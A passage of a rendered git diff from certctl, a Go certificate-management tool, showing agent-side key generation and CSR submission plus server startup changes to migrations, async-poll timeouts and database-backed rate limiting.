||||||
|
a.logger.Error("failed to decode work response", "error", err)
|
||||||
|
a.consecutiveFailures++
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.consecutiveFailures = 0
|
||||||
|
|
||||||
|
if workResp.Count == 0 {
|
||||||
|
a.logger.Debug("no pending work")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("received work", "job_count", workResp.Count)
|
||||||
|
|
||||||
|
// Process each job based on type and status
|
||||||
|
for _, job := range workResp.Jobs {
|
||||||
|
switch {
|
||||||
|
case job.Status == "AwaitingCSR":
|
||||||
|
// Agent keygen mode: generate key locally, create CSR, submit to server
|
||||||
|
a.executeCSRJob(ctx, job)
|
||||||
|
case job.Type == "Deployment":
|
||||||
|
a.executeDeploymentJob(ctx, job)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// executeCSRJob handles an AwaitingCSR job: generates a private key locally, creates a CSR,
|
||||||
|
// and submits it to the control plane for signing. The private key is stored on the local
|
||||||
|
// filesystem with 0600 permissions and NEVER sent to the server.
|
||||||
|
//
|
||||||
|
// Flow:
|
||||||
|
// 1. Generate ECDSA P-256 key pair
|
||||||
|
// 2. Store private key to disk (keyDir/certID.key) with 0600 permissions
|
||||||
|
// 3. Create CSR with common name and SANs from work response
|
||||||
|
// 4. Submit CSR to control plane via POST /agents/{id}/csr
|
||||||
|
// 5. Server signs the CSR and creates a cert version + deployment jobs
|
||||||
|
func (a *Agent) executeCSRJob(ctx context.Context, job JobItem) {
|
||||||
|
a.logger.Info("executing CSR job (agent-side key generation)",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"certificate_id", job.CertificateID,
|
||||||
|
"common_name", job.CommonName)
|
||||||
|
|
||||||
|
// Step 1: Generate ECDSA P-256 key pair
|
||||||
|
privKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("failed to generate private key",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key generation failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("generated ECDSA P-256 key pair locally",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"certificate_id", job.CertificateID)
|
||||||
|
|
||||||
|
// Step 2: Store private key to disk with secure permissions.
|
||||||
|
//
|
||||||
|
// Bundle-9 / Audit L-002 + L-003: marshal+write through helpers that
|
||||||
|
// (a) zeroize the in-heap DER buffer immediately after the PEM block is
|
||||||
|
// constructed so the private scalar's exposure window is bounded by
|
||||||
|
// this function call, and (b) assert the key directory is mode 0700
|
||||||
|
// before any write touches disk. Also defer-clear the PEM buffer for
|
||||||
|
// the same reason — the encoded key isn't sensitive in transit (it's
|
||||||
|
// going to disk) but lingers on the heap if we don't.
|
||||||
|
keyPath := filepath.Join(a.config.KeyDir, job.CertificateID+".key")
|
||||||
|
if err := ensureAgentKeyDirSecure(filepath.Dir(keyPath)); err != nil {
|
||||||
|
a.logger.Error("agent key dir hardening failed", "job_id", job.ID, "error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key dir hardening failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
var privKeyPEM []byte
|
||||||
|
if marshalErr := marshalAgentKeyAndZeroize(privKey, func(der []byte) error {
|
||||||
|
privKeyPEM = pem.EncodeToMemory(&pem.Block{
|
||||||
|
Type: "EC PRIVATE KEY",
|
||||||
|
Bytes: der,
|
||||||
|
})
|
||||||
|
return nil
|
||||||
|
}); marshalErr != nil {
|
||||||
|
a.logger.Error("failed to marshal private key",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"error", marshalErr)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key marshal failed: %v", marshalErr)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
defer clear(privKeyPEM)
|
||||||
|
|
||||||
|
if err := os.WriteFile(keyPath, privKeyPEM, 0600); err != nil {
|
||||||
|
a.logger.Error("failed to write private key to disk",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"key_path", keyPath,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key storage failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("private key stored securely",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"key_path", keyPath,
|
||||||
|
"permissions", "0600")
|
||||||
|
|
||||||
|
// Validate common name is present
|
||||||
|
if job.CommonName == "" {
|
||||||
|
a.logger.Error("empty common name in CSR job", "job_id", job.ID)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", "empty common name"); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step 3: Create CSR with common name and SANs
|
||||||
|
// Split SANs into DNS names and email addresses for proper CSR encoding
|
||||||
|
var dnsNames []string
|
||||||
|
var emailAddresses []string
|
||||||
|
for _, san := range job.SANs {
|
||||||
|
if strings.Contains(san, "@") {
|
||||||
|
emailAddresses = append(emailAddresses, san)
|
||||||
|
} else {
|
||||||
|
dnsNames = append(dnsNames, san)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
csrTemplate := &x509.CertificateRequest{
|
||||||
|
Subject: pkix.Name{
|
||||||
|
CommonName: job.CommonName,
|
||||||
|
},
|
||||||
|
DNSNames: dnsNames,
|
||||||
|
EmailAddresses: emailAddresses,
|
||||||
|
}
|
||||||
|
|
||||||
|
csrDER, err := x509.CreateCertificateRequest(rand.Reader, csrTemplate, privKey)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("failed to create CSR",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("CSR creation failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
csrPEM := string(pem.EncodeToMemory(&pem.Block{
|
||||||
|
Type: "CERTIFICATE REQUEST",
|
||||||
|
Bytes: csrDER,
|
||||||
|
}))
|
||||||
|
|
||||||
|
// Step 4: Submit CSR to the control plane (only the public key leaves the agent)
|
||||||
|
a.logger.Info("submitting CSR to control plane",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"certificate_id", job.CertificateID)
|
||||||
|
|
||||||
|
submitPath := fmt.Sprintf("/api/v1/agents/%s/csr", a.config.AgentID)
|
||||||
|
resp, err := a.makeRequest(ctx, http.MethodPost, submitPath, map[string]string{
|
||||||
|
"csr_pem": csrPEM,
|
||||||
|
"certificate_id": job.CertificateID,
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("failed to submit CSR",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("CSR submission failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
defer resp.Body.Close()
|
||||||
|
|
||||||
|
if resp.StatusCode != http.StatusAccepted {
|
||||||
|
body, _ := io.ReadAll(resp.Body)
|
||||||
|
a.logger.Error("CSR submission rejected",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"status", resp.StatusCode,
|
||||||
|
"body", string(body))
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("CSR rejected: %s", string(body))); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("CSR submitted and signed successfully",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"certificate_id", job.CertificateID,
|
||||||
|
"key_path", keyPath)
|
||||||
|
}
|
||||||
+58
-667
@@ -5,8 +5,6 @@ package main
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"context"
|
"context"
|
||||||
"crypto"
|
|
||||||
"crypto/tls"
|
|
||||||
"crypto/x509"
|
"crypto/x509"
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"encoding/pem"
|
"encoding/pem"
|
||||||
@@ -29,13 +27,12 @@ import (
|
|||||||
"github.com/certctl-io/certctl/internal/auth/bootstrap"
|
"github.com/certctl-io/certctl/internal/auth/bootstrap"
|
||||||
"github.com/certctl-io/certctl/internal/auth/breakglass"
|
"github.com/certctl-io/certctl/internal/auth/breakglass"
|
||||||
oidcsvc "github.com/certctl-io/certctl/internal/auth/oidc"
|
oidcsvc "github.com/certctl-io/certctl/internal/auth/oidc"
|
||||||
oidcdomain "github.com/certctl-io/certctl/internal/auth/oidc/domain"
|
|
||||||
"github.com/certctl-io/certctl/internal/auth/session"
|
"github.com/certctl-io/certctl/internal/auth/session"
|
||||||
userdomain "github.com/certctl-io/certctl/internal/auth/user/domain"
|
|
||||||
"github.com/certctl-io/certctl/internal/config"
|
"github.com/certctl-io/certctl/internal/config"
|
||||||
discoveryawssm "github.com/certctl-io/certctl/internal/connector/discovery/awssm"
|
discoveryawssm "github.com/certctl-io/certctl/internal/connector/discovery/awssm"
|
||||||
discoveryazurekv "github.com/certctl-io/certctl/internal/connector/discovery/azurekv"
|
discoveryazurekv "github.com/certctl-io/certctl/internal/connector/discovery/azurekv"
|
||||||
discoverygcpsm "github.com/certctl-io/certctl/internal/connector/discovery/gcpsm"
|
discoverygcpsm "github.com/certctl-io/certctl/internal/connector/discovery/gcpsm"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/issuer/asyncpoll"
|
||||||
notifyemail "github.com/certctl-io/certctl/internal/connector/notifier/email"
|
notifyemail "github.com/certctl-io/certctl/internal/connector/notifier/email"
|
||||||
notifyopsgenie "github.com/certctl-io/certctl/internal/connector/notifier/opsgenie"
|
notifyopsgenie "github.com/certctl-io/certctl/internal/connector/notifier/opsgenie"
|
||||||
notifypagerduty "github.com/certctl-io/certctl/internal/connector/notifier/pagerduty"
|
notifypagerduty "github.com/certctl-io/certctl/internal/connector/notifier/pagerduty"
|
||||||
@@ -45,7 +42,6 @@ import (
|
|||||||
"github.com/certctl-io/certctl/internal/domain"
|
"github.com/certctl-io/certctl/internal/domain"
|
||||||
authdomainAlias "github.com/certctl-io/certctl/internal/domain/auth"
|
authdomainAlias "github.com/certctl-io/certctl/internal/domain/auth"
|
||||||
"github.com/certctl-io/certctl/internal/ratelimit"
|
"github.com/certctl-io/certctl/internal/ratelimit"
|
||||||
"github.com/certctl-io/certctl/internal/repository"
|
|
||||||
"github.com/certctl-io/certctl/internal/repository/postgres"
|
"github.com/certctl-io/certctl/internal/repository/postgres"
|
||||||
"github.com/certctl-io/certctl/internal/scep/intune"
|
"github.com/certctl-io/certctl/internal/scep/intune"
|
||||||
"github.com/certctl-io/certctl/internal/scheduler"
|
"github.com/certctl-io/certctl/internal/scheduler"
|
||||||
@@ -55,6 +51,13 @@ import (
|
|||||||
)
|
)
|
||||||
|
|
||||||
func main() {
|
func main() {
|
||||||
|
// Phase 4 DEPL-M1 closure (2026-05-14): --migrate-only flag for
|
||||||
|
// the Helm pre-install/pre-upgrade hook. Phase 9 Sprint 8b
|
||||||
|
// (2026-05-14) extracted the flag-parse + the migration-execution
|
||||||
|
// block to cmd/server/migrations.go; see that file's doc-comment
|
||||||
|
// for the full Phase 4 lifecycle rationale.
|
||||||
|
migrateOnly := parseMigrateOnlyFlag()
|
||||||
|
|
||||||
// Load configuration
|
// Load configuration
|
||||||
cfg, err := config.Load()
|
cfg, err := config.Load()
|
||||||
if err != nil {
|
if err != nil {
|
||||||
@@ -131,6 +134,19 @@ func main() {
|
|||||||
logger.Info("agent bootstrap token configured (length redacted; constant-time compare on POST /api/v1/agents)")
|
logger.Info("agent bootstrap token configured (length redacted; constant-time compare on POST /api/v1/agents)")
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Phase 6 SCALE-M3 closure (2026-05-14): operator-overridable
|
||||||
|
// package-level default for the asyncpoll MaxWait fallback.
|
||||||
|
// Per-connector overrides (CERTCTL_DIGICERT_POLL_MAX_WAIT_SECONDS,
|
||||||
|
// CERTCTL_ENTRUST_POLL_MAX_WAIT_SECONDS, etc.) still win when set;
|
||||||
|
// this global env is the middle of the priority chain (above the
|
||||||
|
// 10-minute package default const, below per-connector overrides).
|
||||||
|
// See internal/connector/issuer/asyncpoll/asyncpoll.go for the
|
||||||
|
// SetDefaultMaxWait contract.
|
||||||
|
if v, _ := strconv.Atoi(os.Getenv("CERTCTL_ASYNC_POLL_MAX_WAIT_SECONDS")); v > 0 {
|
||||||
|
asyncpoll.SetDefaultMaxWait(time.Duration(v) * time.Second)
|
||||||
|
logger.Info("asyncpoll default max-wait override", "seconds", v)
|
||||||
|
}
|
||||||
|
|
||||||
// Initialize database connection pool.
|
// Initialize database connection pool.
|
||||||
//
|
//
|
||||||
// Bundle 3 closure (D12): pre-Bundle-3 the operator-facing
|
// Bundle 3 closure (D12): pre-Bundle-3 the operator-facing
|
||||||
@@ -146,47 +162,14 @@ func main() {
|
|||||||
defer db.Close()
|
defer db.Close()
|
||||||
logger.Info("connected to database")
|
logger.Info("connected to database")
|
||||||
|
|
||||||
// Run migrations
|
// Phase 4 DEPL-M1 + Phase 9 Sprint 8b — the migration-via-hook
|
||||||
logger.Info("running migrations", "path", cfg.Database.MigrationsPath)
|
// posture (Compose / Helm-with-hook / bare --migrate-only) lives
|
||||||
if err := postgres.RunMigrations(db, cfg.Database.MigrationsPath); err != nil {
|
// in runBootMigrations (cmd/server/migrations.go). Returns true
|
||||||
logger.Error("failed to run migrations", "error", err)
|
// when --migrate-only was set so we can return from main()
|
||||||
os.Exit(1)
|
// cleanly (deferred db.Close runs vs the pre-Sprint-8b os.Exit(0)
|
||||||
}
|
// which skipped defers — see migrations.go for the rationale).
|
||||||
logger.Info("migrations completed")
|
if exitAfterMigrations := runBootMigrations(cfg, db, logger, migrateOnly); exitAfterMigrations {
|
||||||
|
return
|
||||||
// Apply baseline seed data.
|
|
||||||
//
|
|
||||||
// U-3 (P1, cat-u-seed_initdb_schema_drift): pre-U-3 seed.sql was mounted
|
|
||||||
// into postgres `/docker-entrypoint-initdb.d/` alongside a hand-curated
|
|
||||||
// subset of migrations. Adding a migration that introduced a new column
|
|
||||||
// referenced by seed.sql (cat-o-retry_interval_unit_mismatch /
|
|
||||||
// policy_rules.severity / etc.) without also updating the compose volume
|
|
||||||
// mounts caused initdb to crash on first up. Post-U-3 the compose stack
|
|
||||||
// drops all initdb mounts; postgres comes up with empty schema, the
|
|
||||||
// server runs RunMigrations above, then this RunSeed call lands the
|
|
||||||
// baseline data — all from a single source of truth (this binary).
|
|
||||||
// See internal/repository/postgres/db.go::RunSeed for the contract.
|
|
||||||
logger.Info("applying baseline seed", "path", cfg.Database.MigrationsPath)
|
|
||||||
if err := postgres.RunSeed(db, cfg.Database.MigrationsPath); err != nil {
|
|
||||||
logger.Error("failed to apply seed data", "error", err)
|
|
||||||
os.Exit(1)
|
|
||||||
}
|
|
||||||
logger.Info("seed completed")
|
|
||||||
|
|
||||||
// Apply demo overlay seed when CERTCTL_DEMO_SEED=true. Pre-U-3 the demo
|
|
||||||
// overlay (deploy/docker-compose.demo.yml) mounted seed_demo.sql into
|
|
||||||
// postgres `/docker-entrypoint-initdb.d/`; that broke once U-3 dropped
|
|
||||||
// the initdb migration mounts (the demo seed references tables that
|
|
||||||
// wouldn't exist at initdb time). The runtime path here is the
|
|
||||||
// post-U-3 replacement. Default-off so a vanilla deploy never lands
|
|
||||||
// fake-history rows. See postgres.RunDemoSeed for the contract.
|
|
||||||
if cfg.Database.DemoSeed {
|
|
||||||
logger.Info("applying demo seed (CERTCTL_DEMO_SEED=true)", "path", cfg.Database.MigrationsPath)
|
|
||||||
if err := postgres.RunDemoSeed(db, cfg.Database.MigrationsPath); err != nil {
|
|
||||||
logger.Error("failed to apply demo seed data", "error", err)
|
|
||||||
os.Exit(1)
|
|
||||||
}
|
|
||||||
logger.Info("demo seed completed")
|
|
||||||
}
|
}
|
||||||
|
|
||||||
// Initialize repositories with real PostgreSQL connection
|
// Initialize repositories with real PostgreSQL connection
|
||||||
@@ -594,7 +577,7 @@ func main() {
|
|||||||
// AuthExemptRouterRoutes path. The service-layer Argon2id lockout
|
// AuthExemptRouterRoutes path. The service-layer Argon2id lockout
|
||||||
// state machine remains the second line of defense.
|
// state machine remains the second line of defense.
|
||||||
breakglassHandler.SetLoginRateLimiter(
|
breakglassHandler.SetLoginRateLimiter(
|
||||||
ratelimit.NewSlidingWindowLimiter(5, time.Minute, 50_000),
|
ratelimit.NewLimiter(cfg.RateLimit.SlidingWindowBackend, db, 5, time.Minute, 50_000),
|
||||||
)
|
)
|
||||||
if cfg.Auth.Breakglass.Enabled {
|
if cfg.Auth.Breakglass.Enabled {
|
||||||
logger.Warn("CERTCTL_BREAKGLASS_ENABLED=true — break-glass admin path is ACTIVE; this bypasses SSO. Disable in steady-state.",
|
logger.Warn("CERTCTL_BREAKGLASS_ENABLED=true — break-glass admin path is ACTIVE; this bypasses SSO. Disable in steady-state.",
|
||||||
@@ -1017,7 +1000,7 @@ func main() {
|
|||||||
// Production hardening II Phase 3: per-source-IP OCSP rate limit.
|
// Production hardening II Phase 3: per-source-IP OCSP rate limit.
|
||||||
// Window 1m so the cap counts requests per minute. Map cap 50k
|
// Window 1m so the cap counts requests per minute. Map cap 50k
|
||||||
// matches the SCEP/Intune replay cache cap. Zero disables.
|
// matches the SCEP/Intune replay cache cap. Zero disables.
|
||||||
ocspLimiter := ratelimit.NewSlidingWindowLimiter(cfg.Scheduler.OCSPRateLimitPerIPMin, time.Minute, 50_000)
|
ocspLimiter := ratelimit.NewLimiter(cfg.RateLimit.SlidingWindowBackend, db, cfg.Scheduler.OCSPRateLimitPerIPMin, time.Minute, 50_000)
|
||||||
certificateHandler.SetOCSPRateLimiter(ocspLimiter)
|
certificateHandler.SetOCSPRateLimiter(ocspLimiter)
|
||||||
issuerHandler := handler.NewIssuerHandler(issuerService)
|
issuerHandler := handler.NewIssuerHandler(issuerService)
|
||||||
targetHandler := handler.NewTargetHandler(targetService)
|
targetHandler := handler.NewTargetHandler(targetService)
|
||||||
@@ -1082,7 +1065,7 @@ func main() {
|
|||||||
exportHandler := handler.NewExportHandler(exportService)
|
exportHandler := handler.NewExportHandler(exportService)
|
||||||
// Production hardening II Phase 3: per-actor cert-export rate limit.
|
// Production hardening II Phase 3: per-actor cert-export rate limit.
|
||||||
// Window 1h so the cap counts exports per hour. Zero disables.
|
// Window 1h so the cap counts exports per hour. Zero disables.
|
||||||
exportLimiter := ratelimit.NewSlidingWindowLimiter(cfg.Scheduler.CertExportRateLimitPerActorHr, time.Hour, 50_000)
|
exportLimiter := ratelimit.NewLimiter(cfg.RateLimit.SlidingWindowBackend, db, cfg.Scheduler.CertExportRateLimitPerActorHr, time.Hour, 50_000)
|
||||||
exportHandler.SetExportRateLimiter(exportLimiter)
|
exportHandler.SetExportRateLimiter(exportLimiter)
|
||||||
|
|
||||||
bulkRevocationHandler := handler.NewBulkRevocationHandler(bulkRevocationService)
|
bulkRevocationHandler := handler.NewBulkRevocationHandler(bulkRevocationService)
|
||||||
@@ -1226,6 +1209,29 @@ func main() {
|
|||||||
sched.SetSessionGarbageCollector(sessionService)
|
sched.SetSessionGarbageCollector(sessionService)
|
||||||
sched.SetBCLReplayGarbageCollector(bclReplayRepo) // Audit 2026-05-10 HIGH-3.
|
sched.SetBCLReplayGarbageCollector(bclReplayRepo) // Audit 2026-05-10 HIGH-3.
|
||||||
sched.SetSessionGCInterval(cfg.Auth.Session.GCInterval)
|
sched.SetSessionGCInterval(cfg.Auth.Session.GCInterval)
|
||||||
|
|
||||||
|
// Phase 13 Sprint 13.3 closure (ARCH-M1): when the operator selected
|
||||||
|
// CERTCTL_RATE_LIMIT_BACKEND=postgres, wire the bucket janitor so
|
||||||
|
// stale rows from rate_limit_buckets get swept on the configured
|
||||||
|
// interval. The in-memory backend's prune-on-Allow path keeps
|
||||||
|
// buckets short-lived without a separate sweep, so we skip the
|
||||||
|
// loop entirely for backend=memory.
|
||||||
|
//
|
||||||
|
// maxWindow = 24h: the EST per-principal limiter is the longest
|
||||||
|
// window any current caller configures (the breakglass / OCSP /
|
||||||
|
// export / EST failed-basic limiters use shorter windows). Bump
|
||||||
|
// this if a new caller introduces a longer window — rows pruned
|
||||||
|
// inside their window aren't deletable.
|
||||||
|
if cfg.RateLimit.SlidingWindowBackend == "postgres" {
|
||||||
|
rateLimitGC := ratelimit.NewPostgresGC(db, 24*time.Hour)
|
||||||
|
sched.SetRateLimitGarbageCollector(rateLimitGC)
|
||||||
|
sched.SetRateLimitGCInterval(cfg.RateLimit.SlidingWindowJanitorInterval)
|
||||||
|
logger.Info("rate-limit GC sweep enabled (postgres backend)",
|
||||||
|
"interval", cfg.RateLimit.SlidingWindowJanitorInterval.String(),
|
||||||
|
"max_window", "24h")
|
||||||
|
} else {
|
||||||
|
logger.Info("rate-limit backend = memory; postgres GC sweep not wired (in-memory backend self-prunes)")
|
||||||
|
}
|
||||||
logger.Info("session GC sweep enabled",
|
logger.Info("session GC sweep enabled",
|
||||||
"interval", cfg.Auth.Session.GCInterval.String(),
|
"interval", cfg.Auth.Session.GCInterval.String(),
|
||||||
"absolute_timeout", cfg.Auth.Session.AbsoluteTimeout.String(),
|
"absolute_timeout", cfg.Auth.Session.AbsoluteTimeout.String(),
|
||||||
@@ -1549,7 +1555,7 @@ func main() {
|
|||||||
// release. The shared SlidingWindowLimiter applies the same
|
// release. The shared SlidingWindowLimiter applies the same
|
||||||
// math the SCEP/Intune limiter uses — extracted in Phase 4.1
|
// math the SCEP/Intune limiter uses — extracted in Phase 4.1
|
||||||
// of this bundle so both call sites share the implementation.
|
// of this bundle so both call sites share the implementation.
|
||||||
failed := ratelimit.NewSlidingWindowLimiter(10, time.Hour, 50_000)
|
failed := ratelimit.NewLimiter(cfg.RateLimit.SlidingWindowBackend, db, 10, time.Hour, 50_000)
|
||||||
estHandler.SetSourceIPRateLimiter(failed)
|
estHandler.SetSourceIPRateLimiter(failed)
|
||||||
}
|
}
|
||||||
// Phase 2.1: mTLS sibling route. When MTLSEnabled=true, build a
|
// Phase 2.1: mTLS sibling route. When MTLSEnabled=true, build a
|
||||||
@@ -1605,7 +1611,7 @@ func main() {
|
|||||||
mtlsHandler.SetChannelBindingRequired(profile.ChannelBindingRequired)
|
mtlsHandler.SetChannelBindingRequired(profile.ChannelBindingRequired)
|
||||||
mtlsHandler.SetServerKeygenEnabled(profile.ServerKeygenEnabled)
|
mtlsHandler.SetServerKeygenEnabled(profile.ServerKeygenEnabled)
|
||||||
if profile.RateLimitPerPrincipal24h > 0 {
|
if profile.RateLimitPerPrincipal24h > 0 {
|
||||||
perPrincipal := ratelimit.NewSlidingWindowLimiter(profile.RateLimitPerPrincipal24h, 24*time.Hour, 100_000)
|
perPrincipal := ratelimit.NewLimiter(cfg.RateLimit.SlidingWindowBackend, db, profile.RateLimitPerPrincipal24h, 24*time.Hour, 100_000)
|
||||||
mtlsHandler.SetPerPrincipalRateLimiter(perPrincipal)
|
mtlsHandler.SetPerPrincipalRateLimiter(perPrincipal)
|
||||||
}
|
}
|
||||||
estMTLSHandlers[profile.PathID] = mtlsHandler
|
estMTLSHandlers[profile.PathID] = mtlsHandler
|
||||||
@@ -1627,7 +1633,7 @@ func main() {
|
|||||||
// when configured). The mTLS handler above gets its own
|
// when configured). The mTLS handler above gets its own
|
||||||
// limiter instance so the two routes don't share a bucket.
|
// limiter instance so the two routes don't share a bucket.
|
||||||
if profile.RateLimitPerPrincipal24h > 0 {
|
if profile.RateLimitPerPrincipal24h > 0 {
|
||||||
perPrincipal := ratelimit.NewSlidingWindowLimiter(profile.RateLimitPerPrincipal24h, 24*time.Hour, 100_000)
|
perPrincipal := ratelimit.NewLimiter(cfg.RateLimit.SlidingWindowBackend, db, profile.RateLimitPerPrincipal24h, 24*time.Hour, 100_000)
|
||||||
estHandler.SetPerPrincipalRateLimiter(perPrincipal)
|
estHandler.SetPerPrincipalRateLimiter(perPrincipal)
|
||||||
}
|
}
|
||||||
estHandlers[profile.PathID] = estHandler
|
estHandlers[profile.PathID] = estHandler
|
||||||
@@ -2275,618 +2281,3 @@ func main() {
|
|||||||
|
|
||||||
logger.Info("certctl server stopped")
|
logger.Info("certctl server stopped")
|
||||||
}
|
}
|
||||||
|
|
||||||
// preflightSCEPChallengePassword enforces the H-2 fix: if SCEP is enabled, a
|
|
||||||
// non-empty challenge password MUST be configured. Returns a non-nil error
|
|
||||||
// otherwise so the caller can refuse to start the control plane (CWE-306,
|
|
||||||
// missing authentication for a critical function).
|
|
||||||
//
|
|
||||||
// This helper is extracted so the check can be unit tested without booting
|
|
||||||
// the full server. The caller (main) is responsible for translating the
|
|
||||||
// returned error into a structured log line and os.Exit(1).
|
|
||||||
func preflightSCEPChallengePassword(enabled bool, challengePassword string) error {
|
|
||||||
if !enabled {
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
if challengePassword == "" {
|
|
||||||
return fmt.Errorf("SCEP enabled but CERTCTL_SCEP_CHALLENGE_PASSWORD is empty: " +
|
|
||||||
"SCEP enrollment would accept any client (CWE-306); " +
|
|
||||||
"configure a non-empty shared secret or set CERTCTL_SCEP_ENABLED=false")
|
|
||||||
}
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// preflightSCEPMTLSTrustBundle validates a per-profile mTLS client-CA
|
|
||||||
// trust bundle. SCEP RFC 8894 + Intune master bundle Phase 6.5.
|
|
||||||
//
|
|
||||||
// Mirrors preflightSCEPRACertKey's no-op-when-disabled pattern; otherwise
|
|
||||||
// the checks are:
|
|
||||||
//
|
|
||||||
// 1. Path is non-empty (the Validate() refuse covers this too, but
|
|
||||||
// preflight reports the specific failure with an actionable error
|
|
||||||
// string + os.Exit(1) at the call site).
|
|
||||||
// 2. File exists + readable.
|
|
||||||
// 3. PEM-decodes to ≥1 CERTIFICATE block.
|
|
||||||
// 4. None of the bundled certs is past NotAfter — an expired trust
|
|
||||||
// anchor would silently reject every client cert at runtime.
|
|
||||||
//
|
|
||||||
// On success, returns the parsed *x509.CertPool ready to inject into the
|
|
||||||
// per-profile SCEPHandler via SetMTLSTrustPool. Each bundled cert also
|
|
||||||
// contributes to the union pool that backs the TLS-layer
|
|
||||||
// VerifyClientCertIfGiven.
|
|
||||||
func preflightSCEPMTLSTrustBundle(enabled bool, bundlePath string) (*x509.CertPool, error) {
|
|
||||||
if !enabled {
|
|
||||||
return nil, nil
|
|
||||||
}
|
|
||||||
if bundlePath == "" {
|
|
||||||
return nil, fmt.Errorf("MTLS enabled but trust bundle path empty: " +
|
|
||||||
"set CERTCTL_SCEP_PROFILE_<NAME>_MTLS_CLIENT_CA_TRUST_BUNDLE_PATH to a PEM file " +
|
|
||||||
"containing the bootstrap-CA certs the operator allows to enroll")
|
|
||||||
}
|
|
||||||
body, err := os.ReadFile(bundlePath)
|
|
||||||
if err != nil {
|
|
||||||
return nil, fmt.Errorf("read MTLS trust bundle: %w (path=%s)", err, bundlePath)
|
|
||||||
}
|
|
||||||
pool := x509.NewCertPool()
|
|
||||||
rest := body
|
|
||||||
count := 0
|
|
||||||
now := time.Now()
|
|
||||||
for {
|
|
||||||
var block *pem.Block
|
|
||||||
block, rest = pem.Decode(rest)
|
|
||||||
if block == nil {
|
|
||||||
break
|
|
||||||
}
|
|
||||||
if block.Type != "CERTIFICATE" {
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
cert, err := x509.ParseCertificate(block.Bytes)
|
|
||||||
if err != nil {
|
|
||||||
return nil, fmt.Errorf("parse MTLS trust bundle cert: %w (path=%s)", err, bundlePath)
|
|
||||||
}
|
|
||||||
if now.After(cert.NotAfter) {
|
|
||||||
return nil, fmt.Errorf("MTLS trust bundle cert expired at %s (subject=%q, path=%s) — replace before restart",
|
|
||||||
cert.NotAfter.Format(time.RFC3339), cert.Subject.CommonName, bundlePath)
|
|
||||||
}
|
|
||||||
pool.AddCert(cert)
|
|
||||||
count++
|
|
||||||
}
|
|
||||||
if count == 0 {
|
|
||||||
return nil, fmt.Errorf("MTLS trust bundle contained no CERTIFICATE PEM blocks (path=%s)", bundlePath)
|
|
||||||
}
|
|
||||||
return pool, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// preflightESTMTLSClientCATrustBundle validates a per-profile EST mTLS
|
|
||||||
// client-CA trust bundle and returns a SIGHUP-reloadable holder.
|
|
||||||
//
|
|
||||||
